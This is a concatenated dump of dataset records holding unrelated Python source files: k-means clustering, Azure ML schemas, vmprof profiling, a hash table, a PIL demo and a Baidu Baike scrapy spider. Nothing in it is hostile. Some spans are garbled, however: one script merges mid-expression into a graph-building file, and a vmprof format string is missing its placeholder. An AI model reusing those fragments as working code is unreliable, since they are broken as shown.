range(m):  # assign every data point to its nearest center\r\n            minDist = inf; minIndex = -1;\r\n            for j in range(k):\r\n                distJI = distMeans(centroids[j,:], dataSet[i,:])\r\n                if distJI < minDist:\r\n                    minDist = distJI; minIndex = j  # if point i is closer to center j, assign i to j\r\n            if clusterAssment[i,0] != minIndex: clusterChanged = True;  # if any assignment changed, keep iterating\r\n            clusterAssment[i,:] = minIndex,minDist**2   # record the assignment of point i\r\n        print (centroids)\r\n        for cent in range(k):   # recompute the centers\r\n            ptsInClust = dataSet[nonzero(clusterAssment[:,0].A == cent)[0]]   # 
take all rows whose first column equals cent\r\n            centroids[cent,:] = mean(ptsInClust, axis = 0)  # the mean of these points is the new center\r\n    return centroids, clusterAssment\r\n\r\n\r\n# use the first two features of each record as its x, y coordinates\r\ndef getXY(dataSet):\r\n    import numpy as np\r\n    m = shape(dataSet)[0]  # number of rows in the data set\r\n    X = []\r\n    Y = []\r\n    for i in range(m):\r\n        X.append(dataSet[i,0])\r\n        Y.append(dataSet[i,1])\r\n    return np.array(X), np.array(Y)\r\n\r\n# visualize the data\r\ndef showCluster(dataSet, k, clusterAssment, centroids):\r\n    fig = plt.figure()\r\n    font = FontProperties(fname=r\"simhei.ttf\", size=14)\r\n    plt.title(\"Driving tendency clustering\", fontproperties=font)\r\n    ax = fig.add_subplot(111)\r\n    data = []\r\n\r\n    for cent in range(k):   # extract the data of each cluster\r\n        ptsInClust = dataSet[nonzero(clusterAssment[:, 0].A == cent)[0]]   # get the data belonging to cluster cent\r\n        print(k,ptsInClust,size(ptsInClust))\r\n        data.append(ptsInClust)\r\n\r\n    for cent, c, marker in zip(range(k), ['r', 'g', 'b', 'y'], ['^', 'o', '*', 's']):  # scatter plot of the data points\r\n        X, Y = getXY(data[cent])\r\n        ax.scatter(X, Y, s=80, c=c, marker=marker)\r\n\r\n    centroidsX, centroidsY = getXY(centroids)\r\n    # ax.scatter(centroidsX, centroidsY, s=1000, c='black', marker='+', alpha=1)  # plot the centroids\r\n    ax.set_xlabel('Speed stability',fontproperties=font)\r\n    ax.set_ylabel('Average speed', fontproperties=font)\r\n    plt.savefig(r'kmeans.jpg')\r\n    plt.show()\r\n\r\nif __name__=='__main__':\r\n    # run the kmeans algorithm on the test data\r\n    datMat = mat(loadDataSet(r'All_in_one.csv'))\r\n    # for windows\r\n    # datMat = mat(loadDataSet(r'D:\\BD\\testdata\\All_in_one.csv'))\r\n    myCentroids,clustAssing = kMeans(datMat,3)\r\n    print (myCentroids)\r\n    print (clustAssing)\r\n    showCluster(datMat, 3, clustAssing, myCentroids)","sub_path":"k_means/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"258255318","text":"import time\nimport numpy\nimport pylab\n\ndef getPrimes(limit):\n    candidates = []\n    for i in range(2,limit+1):\n        candidates.append(i)\n    for i in range(2,limit+1):\n        if i in candidates:\n            for j in range(i+i,limit+1,i):\n                if j in candidates:\n                    candidates.remove(j)\n    return candidates\n\ndef main():\n    start = time.time()\n    mainstart = start\n    primes = getPrimes(100)\n    result = []\n    y = []\n    limit = 1000\n    x = 1\n    while x < limit:\n        if time.time() - start > 1:\n            done = float(x) / float(limit)\n            print(done, \"%,\", (((time.time() - mainstart) / x) * limit) / (60))\n            start = time.time()\n        i = 0\n        for prime in primes:\n            if i >= 4:\n                result.append(x)\n                break\n            if x % prime == 0:\n                i += 1\n        x += 1\n    print(result, len(result))\n\nmain()\n","sub_path":"old/python/268.py","file_name":"268.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"127167697","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. 
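268.py above filters primes by repeatedly calling list.remove inside nested loops, which is quadratic. A standard boolean-array Sieve of Eratosthenes does the same job in O(n log log n):

```python
def primes_up_to(limit):
    sieve = [True] * (limit + 1)
    sieve[:2] = [False, False]          # 0 and 1 are not prime
    for i in range(2, int(limit ** 0.5) + 1):
        if sieve[i]:
            for j in range(i * i, limit + 1, i):
                sieve[j] = False        # strike out multiples of i
    return [i for i, is_prime in enumerate(sieve) if is_prime]

assert primes_up_to(20) == [2, 3, 5, 7, 11, 13, 17, 19]
```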
All rights reserved.\n# ---------------------------------------------------------\n\n# pylint: disable=unused-argument,no-self-use\n\nimport logging\n\nfrom marshmallow import ValidationError, fields, post_load, pre_dump\n\nfrom azure.ai.ml._schema.core.fields import ArmVersionedStr, StringTransformedEnum, UnionField\nfrom azure.ai.ml._schema.core.schema import PatchedSchemaMeta, PathAwareSchema\nfrom azure.ai.ml.constants._common import LOCAL_PATH, AssetTypes, AzureMLResourceType, InputOutputModes\n\nmodule_logger = logging.getLogger(__name__)\n\n\nclass InputSchema(metaclass=PatchedSchemaMeta):\n @post_load\n def make(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Input\n\n return Input(**data)\n\n @pre_dump\n def check_dict(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Input\n\n if isinstance(data, Input):\n return data\n raise ValidationError(\"InputSchema needs type Input to dump\")\n\n\ndef generate_path_property(azureml_type):\n return UnionField(\n [\n ArmVersionedStr(azureml_type=azureml_type),\n ArmVersionedStr(azureml_type=LOCAL_PATH, pattern=\"^file:.*\"),\n fields.Str(metadata={\"pattern\": \"^(http(s)?):.*\"}),\n fields.Str(metadata={\"pattern\": \"^(wasb(s)?):.*\"}),\n ArmVersionedStr(azureml_type=LOCAL_PATH, pattern=\"^(?!(azureml|http(s)?|wasb(s)?|file):).*\"),\n ],\n is_strict=True,\n )\n\n\nclass ModelInputSchema(InputSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.DOWNLOAD,\n InputOutputModes.RO_MOUNT,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(\n allowed_values=[\n AssetTypes.CUSTOM_MODEL,\n AssetTypes.MLFLOW_MODEL,\n AssetTypes.TRITON_MODEL,\n ]\n )\n path = generate_path_property(azureml_type=AzureMLResourceType.MODEL)\n datastore = fields.Str(metadata={\"description\": \"Name of the datastore to upload local paths to.\"}, required=False)\n\n\nclass DataInputSchema(InputSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.DOWNLOAD,\n InputOutputModes.RO_MOUNT,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(\n allowed_values=[\n AssetTypes.URI_FILE,\n AssetTypes.URI_FOLDER,\n ]\n )\n path = generate_path_property(azureml_type=AzureMLResourceType.DATA)\n datastore = fields.Str(metadata={\"description\": \"Name of the datastore to upload local paths to.\"}, required=False)\n\n\nclass MLTableInputSchema(InputSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.DOWNLOAD,\n InputOutputModes.RO_MOUNT,\n InputOutputModes.EVAL_MOUNT,\n InputOutputModes.EVAL_DOWNLOAD,\n InputOutputModes.DIRECT,\n ],\n required=False,\n )\n type = StringTransformedEnum(allowed_values=[AssetTypes.MLTABLE])\n path = generate_path_property(azureml_type=AzureMLResourceType.DATA)\n datastore = fields.Str(metadata={\"description\": \"Name of the datastore to upload to.\"}, required=False)\n\n\nclass InputLiteralValueSchema(metaclass=PatchedSchemaMeta):\n value = UnionField([fields.Str(), fields.Bool(), fields.Int(), fields.Float()])\n\n @post_load\n def make(self, data, **kwargs):\n return data[\"value\"]\n\n @pre_dump\n def check_dict(self, data, **kwargs):\n if hasattr(data, \"value\"):\n return data\n raise ValidationError(\"InputLiteralValue must have a field value\")\n\n\nclass OutputSchema(PathAwareSchema):\n mode = StringTransformedEnum(\n allowed_values=[\n InputOutputModes.MOUNT,\n InputOutputModes.UPLOAD,\n InputOutputModes.RW_MOUNT,\n InputOutputModes.DIRECT,\n ],\n 
required=False,\n )\n type = StringTransformedEnum(\n allowed_values=[\n AssetTypes.URI_FILE,\n AssetTypes.URI_FOLDER,\n AssetTypes.CUSTOM_MODEL,\n AssetTypes.MLFLOW_MODEL,\n AssetTypes.MLTABLE,\n AssetTypes.TRITON_MODEL,\n ]\n )\n path = fields.Str()\n\n @post_load\n def make(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Output\n\n return Output(**data)\n\n @pre_dump\n def check_dict(self, data, **kwargs):\n from azure.ai.ml.entities._inputs_outputs import Output\n\n if isinstance(data, Output):\n return data\n # Assists with union schema\n raise ValidationError(\"OutputSchema needs type Output to dump\")\n","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/_schema/job/input_output_entry.py","file_name":"input_output_entry.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"381627532","text":"n = int(input())\r\nmin = 9\r\nmax = 0\r\nwhile n!=0:\r\n if n%10>max:\r\n max = n%10\r\n if n%10 0:\n line = file_path.readline()\n distance = re.split('->|, |:|',line.strip('\\n').replace(\" \", \"\"))\n # Adding vertices\n if distance[0] not in vertices:\n vertices.append(distance[0])\n g.set_vertex(distance[0])\n if distance[1] not in vertices:\n vertices.append(distance[1])\n g.set_vertex(distance[1])\n\n g.set_edge(distance[0] ,distance[1], distance[2])\n vertices_number -=1\n # Reading start and destination point\n line = file_path.readline()\n route = re.split('->',line.strip('\\n').replace('route', ' ').replace(\" \", \"\"))\n\n if route[0] and route[1] in vertices:\n g.set_start(route[0])\n g.set_finish(route[1])\n line = file_path.readline()\n nearby = re.split(',',line.strip('\\n').replace('nearby', ' ').replace(\" \", \"\")) # Reading time to reach closest destiation points for start vertex\n g.set_nearby(nearby[0], nearby[1])\n else:\n g.set_error(\"Not possible to find a route\")\n\n return g\n","sub_path":"graph_tools/build_graph.py","file_name":"build_graph.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"533346159","text":"\n\nfrom xai.brain.wordbase.nouns._moat import _MOAT\n\n#calss header\nclass _MOATS(_MOAT, ):\n\tdef __init__(self,): \n\t\t_MOAT.__init__(self)\n\t\tself.name = \"MOATS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"moat\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_moats.py","file_name":"_moats.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"221842443","text":"import io\nimport os\nimport sys\nimport subprocess\nimport struct\ntry:\n from shutil import which\nexcept ImportError:\n from backports.shutil_which import which\n\nfrom . import cli\n\nimport _vmprof\n\nfrom vmprof.reader import read_prof, MARKER_NATIVE_SYMBOLS\nfrom vmprof.stats import Stats\nfrom vmprof.profiler import Profiler, read_profile\n\n\nPY3 = sys.version_info[0] >= 3\nIS_PYPY = '__pypy__' in sys.builtin_module_names\n\n# it's not a good idea to use a \"round\" default sampling period, else we risk\n# to oversample periodic tasks which happens to run at e.g. 
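The Azure schema module above leans on marshmallow's post_load/pre_dump pair: load() returns a domain object instead of a dict, and dump() refuses anything but that type, which is what makes the schemas usable inside union fields. A minimal standalone sketch of the pattern (marshmallow 3 API; the Point class is illustrative):

```python
from marshmallow import Schema, ValidationError, fields, post_load, pre_dump

class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y

class PointSchema(Schema):
    x = fields.Float()
    y = fields.Float()

    @post_load
    def make(self, data, **kwargs):
        return Point(**data)  # load() now yields a Point, not a dict

    @pre_dump
    def check(self, data, **kwargs):
        if isinstance(data, Point):
            return data
        raise ValidationError("PointSchema needs a Point to dump")

point = PointSchema().load({"x": 1.0, "y": 2.0})  # -> Point instance
```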
100Hz or 1000Hz:\n# http://www.solarisinternals.com/wiki/index.php/DTrace_Topics_Hints_Tips#profile-1001.2C_profile-997.3F\n#\n# To avoid the problem, we use a period which is \"almost\" but not exactly\n# 1000Hz\nDEFAULT_PERIOD = 0.00099\n\ndef disable():\n try:\n _vmprof.disable()\n _gzip_finish()\n except IOError as e:\n raise Exception(\"Error while writing profile: \" + str(e))\n\ndef _is_native_enabled(native):\n if os.name == \"nt\":\n if native:\n raise ValueError(\"native profiling is only supported on Linux & Mac OS X\")\n native = False\n else:\n # TODO native should be enabled by default?\n if native is None:\n native = True\n return native\n\nif IS_PYPY:\n def enable(fileno, period=DEFAULT_PERIOD, memory=False, lines=False, native=None, warn=True):\n pypy_version_info = sys.pypy_version_info[:3]\n if not isinstance(period, float):\n raise ValueError(\"You need to pass a float as an argument\")\n if warn and pypy_version_info < (4, 1, 0):\n raise Exception(\"PyPy <4.1 have various kinds of bugs, pass warn=False if you know what you're doing\")\n if warn and memory:\n print(\"Memory profiling is currently unsupported for PyPy. Running without memory statistics.\")\n if warn and lines:\n print('Line profiling is currently unsupported for PyPy. Running without lines statistics.\\n')\n # TODO fixes currently released pypy's\n native = _is_native_enabled(native)\n gz_fileno = _gzip_start(fileno)\n if pypy_version_info >= (5, 8, 0):\n _vmprof.enable(gz_fileno, period, memory, lines, native)\n else:\n _vmprof.enable(gz_fileno, period) # , memory, lines, native)\nelse:\n # CPYTHON\n def enable(fileno, period=DEFAULT_PERIOD, memory=False, lines=False, native=None):\n if not isinstance(period, float):\n raise ValueError(\"You need to pass a float as an argument\")\n gz_fileno = _gzip_start(fileno)\n native = _is_native_enabled(native)\n _vmprof.enable(gz_fileno, period, memory, lines, native)\n\n def dump_native_symbols(fileno):\n # native symbols cannot be resolved in the signal handler.\n # it would take far too long. 
Thus this method should be called\n # just after the sampling finished and before the file descriptor\n # is closed.\n\n # called from C with the fileno that has been used for this profile\n # duplicates are avoided if this function is only called once for a profile\n fileobj = io.open(fileno, mode='rb', closefd=False)\n fileobj.seek(0)\n _, profiles, _, _, _, _, _ = read_prof(fileobj)\n\n duplicates = set()\n fileobj = io.open(fileno, mode='ab', closefd=False)\n\n for profile in profiles:\n addrs = profile[0]\n for addr in addrs:\n if addr in duplicates:\n continue\n duplicates.add(addr)\n if addr & 0x1 and addr > 1:\n name, lineno, srcfile = _vmprof.resolve_addr(addr)\n if name == \"\" and srcfile == '-':\n name = \"\" % addr\n\n str = \"n:%s:%d:%s\" % (name, lineno, srcfile)\n if PY3:\n str = str.encode()\n out = [MARKER_NATIVE_SYMBOLS, struct.pack(\"l\", addr),\n struct.pack(\"l\", len(str)),\n str]\n fileobj.write(b''.join(out))\n\n def sample_stack_now(skip=0):\n \"\"\" Helper utility mostly for tests, this is considered\n private API.\n\n It will return a list of stack frames the python program currently\n walked.\n \"\"\"\n stackframes = _vmprof.sample_stack_now(skip)\n assert isinstance(stackframes, list)\n return stackframes\n\n def resolve_addr(addr):\n \"\"\" Private API, returns the symbol name of the given address.\n Only considers linking symbols found by dladdr.\n \"\"\"\n return _vmprof.resolve_addr(addr)\n\n\n_gzip_proc = None\n\ndef _gzip_start(fileno):\n \"\"\"Spawn a gzip subprocess that writes compressed profile data to `fileno`.\n\n Return the subprocess' input fileno.\n \"\"\"\n # XXX During the sprint in munich we found several issues\n # on bigger applications running vmprof. For instance:\n # coala or some custom medium sized scripts.\n return fileno\n #\n # Prefer system gzip and fall back to Python's gzip module\n if which(\"gzip\"):\n gzip_cmd = [\"gzip\", \"-\", \"-4\"]\n else:\n gzip_cmd = [\"python\", \"-u\", \"-m\", \"gzip\"]\n global _gzip_proc\n _gzip_proc = subprocess.Popen(gzip_cmd, stdin=subprocess.PIPE,\n stdout=fileno, bufsize=-1,\n close_fds=(sys.platform != \"win32\"))\n if _gzip_proc.returncode is not None:\n # oh, the gzip process has terminated already?\n _gzip_proc = None\n return fileno # proceed without compressing the object\n return _gzip_proc.stdin.fileno()\n\ndef _gzip_finish():\n global _gzip_proc\n if _gzip_proc is not None:\n _gzip_proc.stdin.close()\n returncode = _gzip_proc.wait()\n assert returncode == 0, \\\n \"return code was non zero: %d\" % returncode\n _gzip_proc = None\n","sub_path":"vmprof/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"513752520","text":"import csv\n\ndef calculate_avg_epoch_losses(epoch_losses_G, epoch_losses_D, iter_count):\n avg_epoch_loss_G = sum(epoch_losses_G) / iter_count\n avg_epoch_loss_D = sum(epoch_losses_D) / iter_count\n\n return avg_epoch_loss_G, avg_epoch_loss_D\n\ndef save_training_losses(model_num, losses_G, losses_D): # Verimsiz\n rows = zip(losses_G, losses_D)\n \n with open(\"./checkpoints_\"+str(model_num)+\"/\"+\"losses.csv\", 'w') as l:\n writer = csv.writer(l)\n \n for row in rows:\n writer.writerow(row)\n\ndef get_training_losses(model_num):\n with open(\"./checkpoints_\" + str(model_num) + \"/losses.csv\", 'r') as csv_file:\n lines = csv_file.readlines()\n\n losses_G = []\n losses_D = []\n\n for line in lines:\n data = line.split(',')\n 
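        # Editor's note (hedged, not from the original source): line.split(',')
        # returns raw strings, and data[1] still carries the trailing newline
        # from readlines(), so the lists returned here hold strings rather than
        # numbers; if callers plot or average these losses, casts such as
        # float(data[0]) and float(data[1].strip()) are presumably intended.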
losses_G.append(data[0])\n losses_D.append(data[1])\n\n return losses_G, losses_D","sub_path":"my_pix2pix/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"154321857","text":"FRACTIONS = {\n 'half': 1/2,\n 'havles': 1/2,\n 'halve': 1/2,\n 'quarter': 1/4,\n 'eighth': 1/8,\n 'qtr.': 1/4,\n 'qtr': 1/4,\n}\n\n\nclass Text2Fraction:\n\n @staticmethod\n def text_to_fraction(text):\n if text in FRACTIONS:\n return FRACTIONS[text]\n return 0","sub_path":"recipe_parser/text_to_fraction.py","file_name":"text_to_fraction.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"582596052","text":"from PIL import Image\n\n# PIL is used because of compatiblity with Python 2.7\n\nmy_image = Image.open(\"demo1.jpg\")\n\n# Simple tasks : getting details about the pic \n\nprint (\"Size of the image : \", my_image.size)\nprint(\"Format of the image : \", my_image.format)\nprint(\"Mode of the image : \", my_image.mode)\n\n# Cropping the image \n# we need to fix the area to crop the image to that area\n# The agrguments consists of (left, upper, right, lower)\n\narea = (500, 500, 1500, 1500)\n\n# The box is of size (1500 - 500) X (1500 - 500) = 1000 X 1000\n# The box has length and width of 1000px\n# the cropped Image has the size of 500 X 500\n# That is we started 500 px from left and upper\n\ncropped_image = my_image.crop(area)\n# cropped_image.show()\n\nprint(\"Cropped Image : \")\nprint (\"Size is : \", cropped_image.size, \"Mode is : \", cropped_image.mode)\n\n\n# Merging two different images \n\nimage_1 = Image.open(\"demo2.jpg\")\nimage_2 = Image.open(\"demo3.png\")\n\narea_2 = (0, 0, 1920, 1080)\n\n# image_1.crop(area_2).show()\n\n# Pasting image_2 on image_1 \n\nimage_1.paste(image_2, area_2)\n#image_1.show()\n\n# Every image is made up of 3 colors Red green and Blue \n# Lets split a image in 3 different channels\n\nimage_3 = Image.open(\"demo1.jpg\")\n\n(red, green, blue) = image_3.split()\n\n# the split function returns 3 diffferent tuples \n\n# red.show()\n# green.show()\n# blue.show()\n\n\n# We can also do the opposite of it...merge 3 diffferent R, G, B channels \n# We have already extracted the ddifferent channels in a tuple\n\nimg_mode = image_3.mode\n\nnew_image = Image.merge(img_mode, (red, green, blue))\nnew_image.show()\n\n# We can make different filters just by changing the tuple order\n\nnew_image_2 = Image.merge(img_mode, (green, red, blue))\nnew_image_2.show()\n\n# We can take channels from different images and can merge them in a single image\n# Both the images should be of same size hence we need to crop both the pics \n\nbox = (800, 200, 1800, 1000)\n\nimage_3 = Image.open(\"demo1.jpg\").crop(box)\n(red, green, blue) = image_3.split()\n\nimage_4 = Image.open(\"demo2.jpg\").crop(box)\n(red_1, green_1, blue_1) = image_4.split()\n\n# now we have 6 different channels ans we can merge them together in a new image\n\nnew_image_3 = Image.merge(img_mode, (red_1, green, blue_1))\nnew_image_3.show()\n\n","sub_path":"imgPillow/fun_with_pillow.py","file_name":"fun_with_pillow.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"554024170","text":"from Interfaces import Set\nfrom DLList import DLList\nimport numpy as np\n\n\nclass ChainedHashTable(Set):\n class Node():\n def 
__init__(self, key, value):\n self.key = key\n self.value = value\n\n def __init__(self, dtype=DLList):\n self.dtype = dtype\n self.d = 1\n self.t = self.alloc_table(2 ** self.d)\n self.z = 193759204821\n self.w = 31\n self.n = 0\n\n def alloc_table(self, n: int):\n t = np.zeros(n, dtype=np.object)\n for i in range(n):\n t[i] = self.dtype()\n return t\n\n def hash(self, key: int) -> int:\n return self.z * hash(key) % (2 ** self.w) >> (self.w - self.d)\n\n def size(self) -> int:\n return self.n\n\n def find(self, key: object) -> object:\n for i in range(self.t[self.hash(key)].size()):\n if self.t[self.hash(key)].get(i).key == key:\n return self.t[self.hash(key)].get(i).value\n return None\n\n def add(self, key: object, value: object):\n if self.find(key) != None:\n return None\n if self.n == len(self.t): # added self.n+1\n self.resize()\n self.t[self.hash(key)].append(self.Node(key, value))\n self.n += 1\n return True\n\n def remove(self, key: int) -> object:\n for i in range(self.t[self.hash(key)].size()):\n if self.t[self.hash(key)].get(i).key == key:\n self.t[self.hash(key)].remove(i)\n self.n -= 1\n if len(self.t) >= 3 * self.n:\n self.resize()\n return True\n return None\n\n def resize(self):\n if self.n == len(self.t):\n self.d += 1\n else:\n self.d -= 1\n a = self.alloc_table(2 ** self.d)\n for j in range(len(self.t)):\n for i in range(self.t[j].size()):\n a[self.hash(self.t[j].get(i).key)].append(self.t[j].get(i))\n self.t = a\n\n def __str__(self):\n s = \"[\"\n for i in range(len(self.t)):\n for j in range(len(self.t[i])):\n k = self.t[i][j]\n s += str(k.key)\n s += \":\"\n s += str(k.value)\n s += \";\"\n return s + \"]\"\n\n# x = ChainedHashTable()\n# print(x.remove(1))\n# print(x.find(2))\n# x.add(1, \"first\")\n# x.add(2, \"second\")\n# x.add(3, \"fourth\")\n# print(x)\n# print(x.size())\n# print(x.find(3))\n# print(x.remove(3))\n# print(x)\n# print(x.size())\n# print(x.find(3))\n# x.add(3, \"third\")\n# x.add(4, \"fourth\")\n# x.add(5, \"fifth\")\n# print(x)\n# print(x.size())\n# print(x.find(3))\n\n\n","sub_path":"ChainedHashTable.py","file_name":"ChainedHashTable.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"477392012","text":"import os\nfrom io import TextIOWrapper\n\nfrom py_mini_racer import py_mini_racer\n\nclass ZmeiReactServer(object):\n def __init__(self):\n super().__init__()\n\n self.loaded_files = []\n self.loaded_files_mtime = {}\n\n self.jsi = None\n\n self.checksum = None\n\n def reload_interpreter(self):\n self.jsi = py_mini_racer.MiniRacer()\n\n code = \"\"\"\n var global = this;\n var module = {exports: {}};\n var setTimeout = function(){};\n var clearTimeout = function(){};var console = {\n error: function() {},\n log: function() {},\n warn: function() {}\n };\n \"\"\"\n\n self.jsi.eval(code)\n\n for filename in self.loaded_files:\n self.loaded_files_mtime[filename] = os.path.getmtime(filename)\n self.eval_file(filename)\n\n def autreload(self):\n if len(self.loaded_files_mtime) == 0:\n return\n\n for filename in self.loaded_files:\n if self.loaded_files_mtime[filename] != os.path.getmtime(filename):\n print('Reloading ZmeiReactServer')\n self.reload_interpreter()\n break\n\n def evaljs(self, code):\n if not self.jsi:\n self.reload_interpreter()\n\n return self.jsi.eval(code)\n\n # except JSRuntimeError as e:\n # message = str(e)\n #\n # message = '\\n' + colored('Error:', 'white', 'on_red') + ' ' + message\n #\n # print(message)\n # m = 
re.search('\\(line\\s+([0-9]+)\\)', message)\n # if m:\n # print('-' * 100)\n # print('Source code:')\n # print('-' * 100)\n # row = int(m.group(1)) - 1\n # source = code.splitlines()\n #\n # line = colored(source[row], 'white', 'on_red')\n # print('\\n'.join([f'{x+1}:\\t{source[x]}' for x in range(max(0, row - 10), row)]))\n # print(f'{row+1}:\\t{line}')\n # print('\\n'.join([f'{x+1}:\\t{source[x]}' for x in range(row + 1, min(row + 10, len(source) - 1))]))\n # print('-' * 100)\n\n def load(self, filename):\n self.loaded_files.append(filename)\n\n def eval_file(self, filename):\n with open(filename) as f:\n self.evaljs(f.read())\n","sub_path":"zmei/react.py","file_name":"react.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"321444188","text":"# coding:utf-8\n\nimport sys\nimport os\nimport json\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom ..items import BaikeItem\nfrom scrapy import log\nimport time\nimport common\nfrom urllib.parse import urlparse\nimport config\n\n# split -l 2482 BLM.txt -d -a 4 BLM_\n\nclass MdxSpider(scrapy.Spider):\n name = 'mdx'\n #allowed_domains = ['baike.baidu.com']\n\n def start_requests(self):\n url_file = open('/home/hyc/baike_spider/url.txt', mode='r+', encoding='UTF-8')\n page = 0\n for url in url_file:\n print('请求url:%s' % url)\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=True, meta={'page': page})\n page = page + 1\n # url = 'https://baike.baidu.com/item/%E7%8E%9B%E4%B8%BD%E4%BA%9A%C2%B7%E5%8D%A1%E6%8B%89%E6%96%AF'\n # yield scrapy.Request(url=url, callback=self.parse, dont_filter=True, meta={'page':11})\n\n def parse(self, response):\n # 错误页面\n request_url = 'https://baike.baidu.com/view/%d.html' % response.meta['page']\n if (common.str_encrypt(response.url) == common.str_encrypt('https://baike.baidu.com/error.html')):\n log.msg('请求页面错误,request url:%s, return error html' %request_url, level=log.ERROR)\n return\n\n try:\n content = BeautifulSoup(response.body, \"html.parser\")\n\n # 同义词处理\n lemmaWgt = content.select('div[class=\"lemmaWgt-subLemmaListTitle\"]')\n if (len(lemmaWgt)):\n words = content.select('li[class=\"list-dot list-dot-paddingleft\"]')\n if (len(words)):\n print(words)\n for word in words:\n url = 'https://baike.baidu.com%s' % word.find('a')['href']\n print('同义词处理,返回url:%s, 请求url:%s' % (response.url, url))\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=True, meta={'page': response.meta['page']})\n return\n\n # 其他情况处理\n main_item = response.xpath('//script').re(\"nslog\\(\\)\\.setGlobal\\(\\{([\\d\\D]*?)\\}\\)\")[0]\n main_dict = self.__getMainDict(main_item)\n # for data in main_item.split(','):\n # (key, value) = self.__parseData(data)\n # main_dict[key] = value\n #{'lemmaId': '1719', 'newLemmaId': '16191846', 'subLemmaId': '16136678', 'lemmaTitle': '曹操'}\n\n main_dict['desc'] = content.find(attrs={\"name\": \"description\"})['content']\n\n title_item = content.find('title').string.rstrip(')_百度百科').split('(')\n main_dict['title'] = title_item[0]\n main_dict['item'] = title_item[1] if len(title_item) >= 2 else ''\n #{'title': '曹操', 'newLemmaId': '16191846', 'subLemmaId': '16136678', 'item': '游戏《英雄三国》角色', 'desc': '曹操是一位远程输出型英雄,能够无视敌人的 部分防御,同时拥有强大的远程输出能力。英雄定位: 双修,爆发,后期 远程 老手...', 'lemmaId': '1719', 'lemmaTitle': '曹操'}\n # 主体内容\n wrapper = content.select('div[class=\"content-wrapper\"]')[0]\n wrapper = self.__delWrapper(wrapper)\n\n # 图片、链接处理\n (image_urls, wrapper) = self.__parseWrapper(wrapper, 
main_dict['lemmaId'])\n\n relates = content.select('div[class=\"polysemant-list polysemant-list-normal\"]')\n relates = self.__parseRelate(relates)\n \n content_file = open(config.content_file, mode='a+', encoding='UTF-8')\n content_file.writelines(wrapper + '\\n')\n content_file.close()\n\n data = BaikeItem()\n data['page'] = str(response.meta['page'])\n data['item'] = main_dict['title']\n data['title'] = main_dict['item']\n data['description'] = main_dict['desc']\n data['mainid'] = main_dict['lemmaId']\n data['subid'] = main_dict['subLemmaId']\n data['newLemmaId'] = main_dict['newLemmaId']\n data['content_wrapper'] = wrapper\n data['tags'] = self.__parseSpan(content.select('span[class=\"taglist\"]'))\n data['sort_order'] = 0\n data['time'] = int(time.time())\n data['images'] = image_urls\n data['relates'] = relates\n yield data\n\n except Exception as e:\n self.parseException(request_url)\n except:\n self.parseException(request_url)\n\n def parseException(self, request_url):\n \"\"\"deal exception\"\"\"\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback_details = {\n 'filename': exc_traceback.tb_frame.f_code.co_filename,\n 'lineno': exc_traceback.tb_lineno,\n 'name': exc_traceback.tb_frame.f_code.co_name,\n 'type': exc_type.__name__,\n 'message': exc_value\n }\n print(traceback_details)\n message = 'request_url:%s, message:%s' % (request_url, traceback_details['message'])\n log.msg(message, level=log.ERROR)\n #错误URL\n error_file = open(config.error_file, mode='a+', encoding='UTF-8')\n error_file.writelines(request_url + '\\n')\n error_file.close()\n\n def json_encode(self, items):\n \"\"\" json encode charset \"\"\"\n return json.dumps(items, ensure_ascii=False)\n\n def __parseWrapper(self, wrapper, mainid):\n # 处理图片\n image_urls = []\n for image in wrapper.select('img'):\n attrs = image.attrs\n if ('data-src' in attrs.keys()):\n url = image['data-src']\n elif ('src' in attrs.keys()):\n url = image['src']\n else:\n continue\n\n filename = common.parse_image_url(mainid, url)\n image_urls.append({\n 'filename': filename,\n 'url': url,\n 'mainid': mainid\n })\n image['src'] = filename\n del image['data-src']\n\n # 页面内部\n for item in wrapper.select('div[class=\"lemma-picture text-pic layout-right\"]'):\n item.a['href'] = 'javascript:void(0)'\n del 